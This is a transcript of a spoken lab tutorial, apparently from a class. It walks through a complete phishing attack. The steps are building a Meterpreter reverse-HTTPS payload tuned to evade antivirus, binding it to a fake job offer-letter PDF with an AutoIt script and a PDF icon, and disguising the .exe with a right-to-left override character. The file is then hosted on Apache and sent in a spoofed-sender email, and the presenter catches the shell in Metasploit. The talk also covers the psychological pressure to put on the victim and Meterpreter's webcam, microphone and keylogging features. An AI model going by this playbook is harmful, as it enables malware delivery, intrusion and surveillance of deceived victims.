I'm just restricting this process. I mean, restricting this payload processes to just one. Why? Because if unnecessarily utilization of resources, jumping from one process to the other process, or combining all different cores together and utilizing all those lever resources and all, it's actually a risk. Antivirus will coming in picture. Why this particular process is consuming too much of resources, right? And they will check this and detect it as a malicious file and remove it using the quarantine, or it will quarantine the file. So that is what it is. So I'm just requesting the processor count to only one. So even it is getting executed, so only one resources can be utilized in this program, right? Excuse me. And the next is sleep. I am going to make this payload to sleep for 5 seconds and then execute it. Why? Because I am going to append this payload onto one of the PDF file. So there is two different programs. One is PDF and following to this payload. If the user is opening a PDF file, that is a single trigger, only one trigger, and the two program will get executed. One is PDF, and behind the screen, this shell will be get executed. So if one single trigger to multiple programs is getting muted, so that is actually also suspicious event. Right. So what I am doing is I'm just making the payload to sleep. Even the PDF file is getting open. Wait for 5 seconds. After the PDF is completely open, you can start execute it yourself. So for that, I'm ensuring that payload is sleeping for 5 seconds even after triggerance. Right, all set. Let's see options and ensure that all the necessary parameters are defined properly. Lhost is defined, lport is defined, the processors are defined, and the sleep command is set to 5. Right, all set right now. What we have to do is to generate this as a payload in our executable format. Right now it is in source code. It's a program, it's a pure Go based program which is residing on the Whale system. What we have to do right now is we have to generate and convert it into a executable format. So what is the executable format of Windows? Common executables are, one is exe and the other one is msi, right? So these are all the most common executable in the Windows platform. As we are targeting the Windows systems, we will also use exe format. Okay, so we'll just type a command called generate and it will ask you the file name of which is to be assigned for this payload. I want to keep it as reverse shell https, right? Press enter and sit back and relax. So the payload will get generated in some time. Once it is ready, and we will then it's actually the common payload that can be executed on the victim system. Now the payload is ready. The actual core bone is ready. So now we have to apply the muscles to it to make it over to look it as a genuine file, right? We are interested in this exe file. So this is residing in this particular path, right? I'll just copy this. So the payload is ready. How we can make it available in mobile? So it need to be uploaded onto any website, right? Web-based actually communication is very easy. Just open it in the browser and download it wherever you want it. So that's a pretty easy way of downloading a file, right? So to do that, what we can do, we can start an Apache service. Apache is actually a web server. To do that, you can actually execute a command called systemctl. Let me just check whether this Apache is already running or not. So the service name is Apache 2.service and press enter and it says it's loaded and inactive. It is not started. You can actually start this using a command called systemctl start Apache 2.service and check the status again. Now it is active, right? You could go back to the browser and open this 192.168.1.10, which is nothing but our local machine IP address. If I press enter, if the Apache is started, and you will get this message, Apache 2 debane default page, which is confirming that the web services is started and whatever the file which is getting deployed on this web root folder will be executed or listed over here in this particular area, right? So where is the web root is actually? So the web root is usually residing in the var www html. So this is the location where the web root is residing, right? I'm just changing the directory cd to change the directory to the var folder, variable folder in short, and the www and html is the file. Let me see what is inside in it. So if you see that index.html, so this is that Apache default file, right? So whatever you are dropping here in this particular area will get listed on the browser as a directory indexing. So I want some private space. I will just create a folder called files. Inside files, you can see nothing over here in this, right? So here I'm going to drop the payload which I have created. Copy it, cp-rp, paste the source location. To copy it to the present working directory, you just have to mention the dot. If you want to paste it in the different directory and all, you can mention the path. Since I'm already here inside this the files directory, I'll just put a dot and paste the payload here. So now if you could see, the rev shell https.exe is residing in this web root folder. So let's go back to the web browser and see whether we can see this file in the browser. So the folder name which I have created is files and just enter. And if you could see, the revshell.ext, revshell https.exe is ready to be downloaded. If I just click on this link, it will automatically get downloaded into the local system. So for that is the reason we are deploying it to the web infrastructure, right? Now the payload is ready. And then what we have to do right now is we need to find a page, I mean PDF or any other documentation file, which will be acting as a front end to a system. In the back end, this payload will be appended, right? So that can be achieved using a script, AutoIt script. So AutoIt is nothing but it's also a programming language. Let me just open this and I'll show you the script in the first place. Cat payload au.3. So this is a simple script for binding two different operations, I mean two different files together and make it to executable in a single click. So here if you could notice the local variable URLs equal to, it is containing one link. So this link is nothing but the PDF file where the PDF file is residing. I'll just show you. I'll just copy this selected value and go to the browser, and I'll just open it. If you could take a look, the PDF file is opened. It is a sample job offer letter. This the theme that we are going to use it. The concept that we are using in our scenario is nothing but um, what do you call, a guy who is attended an interview and waiting for a response from a company. This we got to know some of the local sources or some informations that we have right now, and we got to know that in a particular company and he is awaiting for an offer letter, or else he had just an attended an interview, one round of interview, and with some amount of this information, and I got to know this guy is actually attended the interview, and he probably waiting for an offer letter from that company if he did well. So let's send a offer letter sample. I mean, not a sample, just a genuine offer letter, which exactly look alike with the it's easy to define. It's in using online tool itself. You can actually create one fake offer letter, and with all the necessary everything, date, name, everything. Just need the name and the date of joining. That is very mandatory. Rest all can be copied from the online. And with that information, you can develop your own offer letter and append a payload with that offer letter and deliver it to the victim. Once the victim is sees that email out of curiosity, so he is interested in how much, what is the joining date and how much the pay that he is getting, and what is the CTC and how much is the amount he is getting in hand. Every calculations start running behind the mind, right? As he is waiting for a waiting to join onto a job, right? I'm using that theme here. So consider this is a genuine offer letter which we are going to deliver to the victim system, right? And that is actually mentioned as a link one, because this link one is the file which is going to open first, and then in the second, the payload link that we are delivering it to the victim system. So this was the previous one. I'll just edit it and replace this link with the existing link that we have, as we have already dropped onto the web service and web root folder. So this is available over here. All we have to do is to mouse over this to this exe file, right click it, copy the link location, and open on a new tab and see whether it is a valid link or not. Yes, it is valid one. And come back to the script over here and just paste the script. Right now, this PDF is the first link and separated by a comma, and the shell is actually a second link, and these two are terminated using the double quotation, right? So these two is ready right now, and in the internet this PDF can be downloaded, and in the local system this exe file can be downloaded. This both file is combined and combined together, and as a resultant it is coming it as an one single executable file, right? And that single file is capable of executing this both the PDF file and the exe shell file, right? So let's see how this works. I'll just save the script and close it. Right now it is ready. The payload is ready. So payload .au3, I mean this AutoHit script can be compiled only with the specific this AutoHit compiler. This AutoHit compiler by default not installed in Kali Linux, but when you are installing a Whale framework, as I told you, it's a simple one step, one command execution to install the framework. It will get installed automatically. So that is nothing but AutoHit compiler, right? It will convert this AutoHit script into exe format. So let me just enhance it. Okay, so this is not enhanceable. Fine, no issues. So it is asking input values, few of the input values, which are, one is the script that we want to compile it, which is here in the desktop folder. I'm just mapping it, and the destination where it want to save the exe file, which is also desktop. I'm totally cool with that. And exe is the file format I want to convert it to make it as an executable. The another very important thing to be noticed here is icon. So when you are converting any file into the executable file, it need to have that adequate icon or the icon that we are intent to convert it. I mean, to showcase to the victim, right? So in our case, as we have using the PDF as an icon, PDF as a file for opening into the system, we will be using a PDF icon. So this PDF icon is easily available on the web page. You can just Google it out and download the PDF icon. I already have downloaded one. I'm just mapping this icon file on here, right? So the icon file is also mapped, and the output directory is mapped, and the input file is also mapped over here. And all you have to is to just convert. Click on convert, right? It's actually very fast, and will since it is a very small script, you can actually convert this auto8 script into a executable file, right? It is converted. We'll just close this and let's go back to the desktop. Okay, I'll show it to you in GUI. Right, so this is now ready, payload.exe. If I open this payload.exe, since it is a Linux terminal, you can actually see only the this diamond icon, as it is Linux distribution, so you cannot execute the exe files and all, right? So when it is actually delivered onto the, you can see it in the Windows machine. You can actually see the PDF icon, and with the executable, this exe file seems to be an executable format, right? So now the PDF file and shell file is both are appended and ready to be executed. But the one thing, we cannot deliver this payload. I mean, the payload.exe is something not seems to be a genuine file, right? So this cannot be delivered onto a victim systems as exe. Even the layman can understand this exe file is some executable file. How can it be a PDF file? Even though it is opening a PDF file, no one will trust that something is going behind this, right? Two, we have to play with this extension. We have to convert this extension, exe extension, is into something else. Right now, we will just rename this file into offer letter, right? As we are delivering the offer letter, right? Offer letter dot exe. I will just copy this offer letter dot exe and I'll rename it. I'll go back to the text editor. I'll just paste this value offer letter dot exe. This is the existing problem, and what we want to achieve is offer letter dot pdf, and the extension that we want here is pdf, but it is in exe format. How can we achieve this? There is one way, that is called character overriding. So this character overriding, you can actually, the extension of that file is executable, it's exe only, but when the people is viewing in the display or any prompt anywhere, it is showing it as pdf. So that is the beauty of it. So that it can be, for to do that, what we have to do first, we have to write the extension in the reverse format. What is the extension is pdf. Now in reverse format, it is called fdp, right? So offer letter fdp dot exe. I mean, before the dot, just before the dot, this extension should come in the reverse order. So fdp, which means in the reverse order, if you could see pdf, right? And dot exe. So this is how it should look like, right? And you can search in Kali Linux called characters. There is an utility called characters, and in the characters you can go and search for right to left. Sorry, left. In this right to left, you have to actually select the override. Right to left override. There are 4 different outcomes. One is the right to left override. You just have to click on this, and a pop-up window will appear. In this pop-up window, there is a Unicode value will be displayed in this below area. All you have to do is to copy these characters. This one, there is a button here, right? Copy character. you have to click this copy character. Now the character is copied to the clipboard. That's it, nothing else. So we will just close this window and take a closer look and pay close attention. Right now we are placing the cursor in the before F, which is extension. This FDP is the reverse order of extension, right? Just before there. And I'm pressing a control V to paste the value which I have copied from the character. So control V. Did you see the magic? It's automatically rotated. The PDF is FDP is converted into right to left and went to the right side of the dot, and the exe is coming into the left side of this dot. So that is the character override. So this is how we can play with the extension and showcase that extension is spoofed and while delivering the payloads onto the victim system, right? I'll just redo it again. The FDP is in a reverse order. I mean, the PDF is in reverse order as FDP dot exe, and before the extension starts, the PDF extension starts, place the cursor and paste the value. Now it is very clear that so this is the extension of the file. So now people will think that offer letter exe.pdf. It's a PDF file, right? .pdf is usually a PDF file. Nobody will have any confusion. But still, the clever people will always think that why something called exe is coming in between. Why there should be an exe without any meaning? Letter is spells as letter, but why? What is that exe? So to avoid that, we can also apply more techniques called you can actually search in Google. So what are the words that is ends with exe? If you would do that search, there is a word called annex, which is actual meaning is some extension of a building, right? So but the in documentation sector, the annexure is also one of the kind of documentation methods is, right? So people will thought that there could be a spelling mistake, or even if they're just seeing the offer letter, no one will pay attention to this small mistakes. So instead what we can do it sorry, so what we can do it here is we will just place this ANN right after the offer letter. So just redo all the exercises again. FTP is in reverse original format only. Right after the letter, I will just write this ANN. That's it. And now I will paste the character which I have copied. So characters, the recently used one is right to left Unicode. I'll just close this and I'll paste it. Now take a look. It's offer letter annex.pdf. No one will have any doubt on this extension, right? Now the extension is ready. I'll just copy the extension as it is and coming back to the window and just rename the extension. If you could see offer letter annex.pdf, and this icon will disappear when we are delivering it to the Windows system. So you can actually see the PDF icon. Now the file is ready. If the file is getting opened in any systems, front end the PDF will open. The Windows systems, the payload will start to execute, right? So that is the agenda. Now this is all ready. Payload is ready. All we have to do is to deliver those into the victim system. Okay, so mostly when we are delivering, we intend to deliver this into a through the email. So mostly this email services and the middle level server will not process this offer letter. The spoofed extension, especially spoofed extensions, are properly, and when it is getting delivered, maybe sometimes it work or it will not work. To avoid that accuracy, I mean execution of 100%, what we can do is to we can actually zip this file, I mean compress this file into a um, uh, into a compressed format. Why? Because so if that is compressed as a zip file, so the output will be secured, and when it is getting extracted on the victim systems, it will be easy for to open it without any tampering of the extension spoofing or misinterpretation of that extension spoofings, right? So where the file is located in the desktop folder, and here if you could see in the terminal, the extension is reversed. The actual extension is view, but in the browser, I mean the GUI window, you can actually the extension is in the reverse order, right? Zip. I will execute a command called zip offer letter. Sorry, offer letter dot zip. This is the output file format, and the file I want to zip is that offer letter annex dot PDF, right? Enter. So if you could go back to the GUI window again, and you will see this file is getting zipped, and inside that you will see the PDF file, right? Now all we have to do is to put it on the anywhere that can be easily downloadable. I will just drop it onto the Apache web root itself, as I'm going to send to the victim as a link. So I will be asking the victim to download this file and open it, right? Uh, Copy offer letter dot zip to the web root where www html files, right? Inside that you can see this file is residing. Oh, who copied that AU? Let me just go back and index of files. Super. So if you could see, this offer letter dot zip is residing in this particular area. Similarly, you can copy this link location and go back to the different tab and see whether this is particular link is valid or not, right? So you need to make it more easy way. So if one click is there, then suddenly the file should get downloaded. The web service is also okay, or you can drop it onto any of the Google Drive, OneDrive, anywhere, but it should not take off too much of things, right? So too many steps on downloading the letter, or too many steps of reaching these files, it should be avoided actually. So you mostly need to keep this payload as unauthenticated. As soon as the victim opens that link in the browser, it should get download the file. That is why they will not think of any antivirus or what is this file and why it is taking too much of times and all, right? If it is a genuine file, they will spend time, but if it is a bogus file, if they have identified in between, they will immediately close it. So our job is to not to make the victim to think too much. We'll always put them into a pressure to make this file to open, right? All set right now. If I go to the victim system and open it in the browser, it will automatically call this file and get delivered over here, right? Because there is an access enabled from this system to the other system. But in the over the internet, you have to use public IP address for connecting to the attacker system, right? Okay, all set right now. We have to deliver it. How do we deliver? We will send an email using called send email client, which is by default installed in Kali Linux. Send mail is the sorry, send mail or send email. Sorry, Send email is the client that can be used to send any email using the SMTP relay server. So SMTP relay server is nothing but it's a mail server relaying. If you are sending an SMTP protocols and construction, I mean set of rules and passwords and other details to relay to the other server, other email server, it will capture those details and deliver the email to the different systems as your identity. So it will not use its own identity. It will use your identity only to deliver the email, right? So I have one email service subscription. So you can, it's actually trial period. You can subscribe to that and start sending the email. So right now we will not discuss about that. We will just see the command that is used to send the email, right? So let me just quickly go to the command itself as we are having time constraint here. Okay, so the send mail is actually the client that is residing in the command based email system, and -xu is the switch used to mention the username, and xp is the password for the SMTP relay server. I mean, when you are getting inside to the Gmail, you are providing your email ID and password, right? So similar to that. And -s is the SMTP relay server. And this is where the interesting part, -f. So this can be anything. So Dinesh K at the rate skillstar.com. The social engineer, the hacker, will come to know that so Dinesh K is the person who is responsible for releasing the offer letter, or he is the HR manager, or is it some technical manager on that particular company. So he can, if he is delivering that email to the victim, no one will come to know that this is some fake email or a phishing email. The people will never think that. The name based email is more convincing than the distribution list. So if I'm sending you with names and with the domain name like @skillstar and all, it seems to be a genuine. If I'm sending you an email with Dinesh K @GUVI.com or GUVI.co.in, something like that, you guys think that we are already having a communication with the GUVI for classes and all, right? So getting an email from GUVI is not a unlikely thing. You will trust them and open that email and see what is there inside in it, right? So on that trust basis, I'm using Dinesh K @skillstar.com as the sender ID, and the recipient ID is some bogus ID which I have created for this demonstration purpose. That can be mentioned as -t, that is black ops mailbox @gmail.com. And the -u is to mention the subject. I want to do some slight modification here. It is not a job offer. I want to keep it as job offer letter from Skillsda, right? And the message I want to send it to this guy is hello black, and /n is to ensure the next line. We'll just give one more line, and I'm sending you the offer letter. Please go through and let me know if you are fine with the CTC offer. /n for next line, and download the offer letter from the following link, right? So I have to mention the link over here. Either you can give any other public Google Drive usually does virus scan, so that is not advisable to do it. So you can go for a OneDrive based link. So OneDrive is actually easy to download. So when you are accessing that link in a browser, it will automatically download. You don't have to do any clicks on buttons to take it to the next steps for downloading and all. OneDrive is actually advisable.
Dinesh, I guess your microphone is on mute. Dinesh, you're on mute actually.
Oh, I'm sorry. Where I was left?
With the second line actually.
Oh, okay, fine. So the email that we are sending it to the victim, the victim ID is that the fake content with the link that is capable of downloading the payload from our systems. So this send email is the command prompt based email sender. So not just this, there are many other email clients that is helpful. PHP email sender that is actually help you to craft a message in more decent way, and you can actually upload this zip file into as an attachment, and you can use more acrylic colors. You can insert signatures. There are a lot many things that you can do it in your regular email, and you can send it to the victim. Right now, for the demonstration purpose, I'm using this command line based sender ID. Right, so this is confirming to us that email was successfully sent to the victim. Let's go back to the victim's machine and see whether this email is delivered or not. But before that, it's very important thing to that we need to define the platform. It's everything is ready, so all the connections, everything is ready. We need to prepared enough to receive that connection from that victim system, right? For that we are relying on the metasploit tool. Let me just quickly, so there is a use exploit multi handler. Handler is the method that is used to do handle the reverse connection from the remote system. So this is using consuming the payload called generic shell reverse TCP, which I don't want it. I want to set a payload. Since I'm targeting Windows machine, Windows reverse. If you could remember what is the payload which I have used there, that is reverse meterpreter meterpreter reverse HTTPS, right? HTTPS payload, right? Sorry. Show options. It is confirming that Windows is the machine which I am targeting. Meterpreter is the shell type that I have used while crafting the payload, and reverse HTTPS is the connection method. Right? I'll use the same payload, and here also the same values. The L host is 192.168.1.10, and L port seems to be 443, as we had mentioned here, right? L port is 443 and L host is 192.168.1.10. The payload which I have used is meterpreter reverse HTTPS. Same need to be used in the Metasploit also, right? Everything is ready right now, and we have to fire up the command called exploit, and that's it. It's ready right now, and it is ready to capable of receiving a connection from the remote system. So if you could take a closer look here, let me just close it. Okay. Okay, so if you could see, it has started HTTPS reverse handler. Anybody is trying to connect on HTTPS protocol, I mean 443 protocol to this particular IP will be landed onto the meterpreter shell. Okay, we'll go back to the victim systems. Now the victim systems role, and this is actually a Windows 10 machine. In this machine, I have a browser and opened the mailbox which I have created for the as a victim demonstration. Here, if you could see, this is the mailbox, right? If you could confirm, this is the email ID which we had used in the attacker PC. SMTP relay and black ops mailbox at the rate gmail.com. So this is the mail ID, right? The same email ID I had opened here in this Windows machine. And if you could notice that this email is directly delivered onto the primary folder of the Gmail. It is not flagging it as any virus, or it is not flagging it as a spam or anything. And it is looks like a very genuine email, and with the subject that we want to keep it. Like I had kept as an offer letter from Skillstar, and the message is, hello Black, I'm sending you the offer letter. Please go through and let me know if you are fine with the CTC offer, right? Everything is as expected. If you want more, make it more sophisticated, you can go the rich text editor for email senders. Right now, I'm not interested in that. So let me just finish this demo. I'll just copy this link and open it in the different browser. Okay, so Chrome is behaving some. Okay, so this is because this the payload that is actually crafted using this is I have opened this here and this multiple times. So this is categorizing this some malicious file is getting downloaded onto the Windows system. Right, when we are using multiple scripts or a different programming language, you can actually minimize this deduction capabilities of deduction of the systems in the Windows Defender or any other antivirus programs. Right now the file is getting downloaded, and let's go back to the download folder, and if you could see, this file is downloaded over here, and I will extract it as it is a zip file. Okay, so if you could notice, the offer letter annex.pdf is a PDF file which is opened over here. Have you noticed any alarms or nothing? So no detection is possible in this, but you will get a warning message while it is getting executed. So, but that is not a showstopper. With more sophisticated way of working, crafting this payload, you can still avoid that warning message. Now, right now, I'm just opening this PDF file. Yeah, this is the warning message I was talking about. So I'm just making the file to run it anyway. If you could notice in the front end, the sample job offer letter, the PDF file which we are intent to, that is opened in the browser. I mean, whichever the PDF reader. So nothing else, no other thing seems to be abnormal over here. So it is just a PDF file and it is open. Okay, I'll close the settings. Okay, so this is the PDF file that is open, and nothing, no alarms, no suspicious things is happening, and file is already there in that. Okay, so the Windows 10 system is as it is. Let's go back to the attacker PC and see whether we have received the connection from the Windows machine or not. If you could notice, initially it was only the started HTTPS reverse handler, but now if you could see, Meterpreter session 1 opened, which means that you are received this Metasploit is received a connection from that PC, and it is connected right now. I'll just show you. I'll type a command called help, and sysinfo. Sysinfo is the command to tell you what is the remote vulnerable machines, operating systems, versions, and all. The computer name is some desktop or something, and the OS configured is Windows 10, and it is a work group or two logged in user on all those things. There are a lot of things, but the important thing is that you can actually record mic. You can listen to the webcam and read the webcam chats, snaps, and you can take a screenshot of your current working desktops, and you can actually log all the key events. And there are a lot many things are possible with this Meterpreter. So it is just a small thing, and you can actually do port forwarding and all from. You can actually pivot from this network to the. There are a lot many things, but that is all quite advanced stuff. But all you need to know right now is you can actually execute command, and you can upload command files, and you can download files through this Meterpreter module. Right, so let me just get into the system. If you type a command called shell, it will actually dive into the system and give you a command prompt access of the affected Windows machine. If I type a command called dir, you could notice that the payload file which we have created and dropped inside the systems is residing. As I told you, in terminal it can be viewed clearly, the extension spoofings and all, but in GUI it won't, right? Okay, so let me just conclude this. I will just create a text file. This is a proof. Sorry, proof.txt. I'm just executing this command. What I'm doing is I'm just creating a text file over there and with a message called this is a proof. So this is confirming to me that, and to you, this machine is hacked and I can able to modify any files inside in it, and I can create file and I can delete file, I can download the files, right? So I'll just go back to the same folder, and if you could notice the proof.txt, earlier it was not there, right now you could see it, and this is the content which I have typed in is residing in this txt file. So that's it about that. Yeah, that's how you can actually target from the over the internet and craft all these payload mechanisms and finally deliver this into a victim systems. So the only thing is that we need to be very cautious enough on getting a reverse shell. Sometimes if you are sitting behind the home router, it is not possible to get it because the port forwarding need to be enabled on the home routers. So that is all big different methodology and steps.